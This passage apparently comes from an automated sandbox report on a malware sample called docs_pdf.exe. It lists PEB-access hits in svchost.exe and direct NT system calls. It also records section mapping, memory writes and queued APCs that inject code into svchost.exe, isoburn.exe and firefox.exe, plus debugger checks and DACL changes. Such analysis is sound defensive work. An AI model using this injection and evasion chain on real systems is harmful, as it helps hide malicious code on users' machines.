            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0376A430 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0372C427 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037304E5 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037644B0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037BA4B0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037364AB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037EA49A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0372CB7E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03728B50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037DEB50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037E4B4B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037E4B4B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037C6B40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037C6B40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037FAB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037D8B42 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0375EB20 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0375EB20 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037F8B28 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037F8B28 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03804B00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0375EBFC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037BCBF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037DEBD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03740BBE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03740BBE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037E4BB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037E4BB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03804A80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037ACA72 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037ACA72 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037DEA60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03740A5B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03740A5B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03754A35 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03754A35 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0376CA38 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0376CA24 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0375EA2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037BCA11 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0376AAEE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0376AAEE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03730AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03764AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03764AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03738AA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03738AA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03786AA4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03768A90 mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037D4978 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037D4978 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037BC97C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0377096E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0377096E mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0377096E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B0946 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B892A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037C892B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037BC912 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03728918 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03728918 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037AE908 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037AE908 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037629F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037629F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037BE9E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037649D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037FA9D3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037C69C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03804940 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B89B3 mov esi, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B89B3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B89B3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037309AD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037309AD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037BE872 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037BE872 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037C6870 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037C6870 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03760854 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03734859 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03734859 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03742840 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03752835 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\docs_pdf.exe Code function: 0_2_001481F7 GetSecurityDescriptorDacl, _memset, GetAclInformation, GetLengthSid, GetAce, AddAce, GetLengthSid, GetProcessHeap, HeapAlloc, GetLengthSid, CopySid, AddAce, SetSecurityDescriptorDacl, SetUserObjectSecurity
            Source: C:\Users\user\Desktop\docs_pdf.exe Code function: 0_2_0011A364 SetUnhandledExceptionFilter
            Source: C:\Users\user\Desktop\docs_pdf.exe Code function: 0_2_0011A395 SetUnhandledExceptionFilter, UnhandledExceptionFilter

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe NtResumeThread: Direct from: 0x773836AC
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe NtMapViewOfSection: Direct from: 0x77382D1C
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe NtWriteVirtualMemory: Direct from: 0x77382E3C
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe NtProtectVirtualMemory: Direct from: 0x77382F9C
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe NtSetInformationThread: Direct from: 0x773763F9
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe NtCreateMutant: Direct from: 0x773835CC
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe NtNotifyChangeKey: Direct from: 0x77383C2C
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe NtSetInformationProcess: Direct from: 0x77382C5C
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe NtCreateUserProcess: Direct from: 0x7738371C
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe NtQueryInformationProcess: Direct from: 0x77382C26
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe NtResumeThread: Direct from: 0x77382FBC
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe NtWriteVirtualMemory: Direct from: 0x7738490C
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe NtAllocateVirtualMemory: Direct from: 0x77383C9C
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe NtReadFile: Direct from: 0x77382ADC
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe NtAllocateVirtualMemory: Direct from: 0x77382BFC
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe NtDelayExecution: Direct from: 0x77382DDC
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe NtQuerySystemInformation: Direct from: 0x77382DFC
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe NtOpenSection: Direct from: 0x77382E0C
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe NtQueryVolumeInformationFile: Direct from: 0x77382F2C
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe NtQuerySystemInformation: Direct from: 0x773848CC
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe NtReadVirtualMemory: Direct from: 0x77382E8C
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe NtCreateKey: Direct from: 0x77382C6C
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe NtClose: Direct from: 0x77382B6C
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe NtAllocateVirtualMemory: Direct from: 0x773848EC
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe NtQueryAttributesFile: Direct from: 0x77382E6C
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe NtSetInformationThread: Direct from: 0x77382B4C
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe NtTerminateThread: Direct from: 0x77382FCC
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe NtQueryInformationToken: Direct from: 0x77382CAC
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe NtOpenKeyEx: Direct from: 0x77382B9C
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe NtAllocateVirtualMemory: Direct from: 0x77382BEC
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe NtDeviceIoControlFile: Direct from: 0x77382AEC
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe NtCreateFile: Direct from: 0x77382FEC
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe NtOpenFile: Direct from: 0x77382DCC
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exeNtProtectVirtualMemory: Direct from: 0x77377B2EJump to behavior
            Source: C:\Users\user\Desktop\docs_pdf.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\isoburn.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\isoburn.exe | Section loaded: NULL target: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe protection: read write
            Source: C:\Windows\SysWOW64\isoburn.exe | Section loaded: NULL target: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\isoburn.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\isoburn.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\isoburn.exe | Thread register set: target process: 5308
            Source: C:\Windows\SysWOW64\isoburn.exe | Thread APC queued: target process: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
            Source: C:\Users\user\Desktop\docs_pdf.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2CC7008
            Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00148C93 LogonUserW,0_2_00148C93
            Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_000F3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_000F3B4C
